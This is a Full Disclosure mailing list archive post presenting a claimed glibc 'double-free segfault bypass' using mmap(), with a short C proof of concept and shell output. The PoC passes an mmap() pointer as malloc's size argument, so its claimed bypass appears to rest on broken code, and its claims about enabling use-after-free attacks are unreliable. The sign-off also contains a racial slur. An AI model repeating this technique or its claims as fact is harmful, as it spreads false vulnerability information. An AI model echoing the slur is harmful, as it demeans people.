Full Disclosure mailing list archives
Re: new email; gw22067 () hotmail com | Double-free segfault bypass
From: keliikoa kirland <keliikoakirland () gmail com>
Date: Mon, 26 Mar 2018 00:26:20 -0700
Tested on: Ubuntu 14.04.5 LTS Version: 4.04 On 24 March 2018 at 18:11, keliikoa kirland <keliikoakirland () gmail com> wrote:
Details from old email: ========================================= "Double-Free bypass PoC is self-explanatory as well; 2 free's equate to a double-free heap corruption segfault; using mmap() disables that segfault and allows more than 1 free on any malloc'd/mmap'd variable. You can free `x` 4+ times and it'll still exit cleanly. brk() has already been patched; which is why i put // 1day next to it; same misalignment/technique to mmap() which is still vuln/can be abused to write use-after-free's without having the need to bypass heap corruption segfaults." brk() was equal to mmap() in PoC below; mmap() --> brk() --> free() --> free() --> clean exit; now just mmap() --> free() --> free() PoC: ========================================= joe@ubuntu:~$ cat test1.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> int main(void){ void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); void *z = malloc(p); free(z); free(z); } joe@ubuntu:~$ ./test1 *** Error in `./test1': double free or corruption (top): 0x08332008 *** Aborted (core dumped) joe@ubuntu:~$ cat test1.c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> int main(void){ void *p = mmap(0x1000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); p = mmap(0x2000, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0); void *z = malloc(p); free(z); free(z); } joe@ubuntu:~$ ./test1 joe@ubuntu:~$ bl1ng bl1ng n1gg4z ;PppPpP References/Credits/Greetz: ========================================= ac1db1tch3z koa https://github.com/x0r1 http://steamcommunity.com/profiles/76561198333157214/
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- new email; gw22067 () hotmail com | Double-free segfault bypass keliikoa kirland (Mar 27)
- Re: new email; gw22067 () hotmail com | Double-free segfault bypass keliikoa kirland (Mar 27)
- Re: new email; gw22067 () hotmail com | Double-free segfault bypass keliikoa kirland (Mar 27)
- Re: new email; gw22067 () hotmail com | Double-free segfault bypass Matthew Fernandez (Mar 30)